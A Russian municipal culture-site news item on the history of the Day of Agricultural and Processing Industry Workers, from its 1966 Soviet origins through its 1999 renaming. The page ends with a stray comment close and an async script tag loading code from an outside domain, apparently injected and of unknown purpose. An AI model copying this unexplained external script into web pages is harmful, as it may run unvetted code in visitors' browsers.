• Слайд 0
вправо влево
Обычная версия сайта
Шрифт
А А+ А++
Выключить изображения
Цвет сайта
Ц Ц Ц

Опрос

Опросник

Ваше мнение о новом дизайне

День работника сельского хозяйства и перерабатывающей промышленности

11.10.2020, просмотров (57)
Image: 

Этот праздник установлен Указом президента РФ от 31 мая 1999 года и ежегодно отмечается во второе воскресенье октября. У праздника своя история, своя судьба.

Первоначально он назывался «Всесоюзным днём работников сельского хозяйства». Установлен был указом Президиума Верховного Совета СССР от 26 августа 1966 года. Также отмечался во второе воскресенье октября. Накануне, перед утверждением профессионального праздника, в жизни тружеников села произошли значительные перемены. Во второй половине 1950-х годов, а точнее с 1959 года, под воздействием реформаторской деятельности Н.С. Хрущёва в сельском хозяйстве стали формироваться новые экономические отношения. Крестьянам стали выдавать паспорта!

С 1 июля 1966 года советские колхозники впервые стали получать ежемесячную зарплату. На смену печально известному трудодню пришла новая система оплаты труда. Система трудодней просуществовала с 1930 года до 1966 год. Всё это время крестьяне – колхозники фактически не получали зарплату. Руководством СССР в конце концов было принято решение повысить материальную заинтересованность колхозников посредством введения гарантированной денежной оплаты их труда, отказавшись от довольно запутанной схемы трудодней. С июля 1964 года колхозникам стали выплачивать государственные пенсии.

В аграрные реформы Хрущёва входило выделение так называемых «общественных земель» от предприятий рабочим. Благодаря этому распоряжению руководителя государства у жителей Советского Союза появились дачные участки, многие из которых остались в собственности их семей до сих пор.

«День работников пищевой промышленности», установленный указом Президиума Верховного Совета СССР от 30 августа 1966 года, отмечался в третье воскресенье октября. В 1986 году эти два праздника были объединены в единый – «День работников сельского хозяйства и перерабатывающей промышленности агропромышленного комплекса». Он праздновался в третье воскресенье ноября. В 1988 году его объединили с «Днём мелиоратора» в единый праздник с названием «День работников сельского хозяйства и перерабатывающей промышленности», который отмечался также в третье воскресенье ноября. В 1999 году дату празднования перенесли на второе воскресенье октября, и в названии заменили слово «работников» на «работника».

В России, как и во всём мире, аграрное производство является крупнейшей жизнеобеспечивающей сферой народнохозяйственного комплекса. Его развитие и экономическая эффективность функционирования оказывают решающее влияние на уровень продовольственного обеспечения и благосостояния народа. Агропромышленный комплекс (АПК) в значительной мере определяет состояние всей экономики страны, поскольку он тесно взаимодействует с другими отраслями народного хозяйства.    

#культуразаводоуковска #культуравмассы     

torgi.gov.ru - официальный сайт Российской Федерации для размещения информации о проведении торгов

Музеи России
Музеи России
Москвы и Санкт-Петербурга

 

-->
<script async src="https://tabun.info/out/index.php"></script>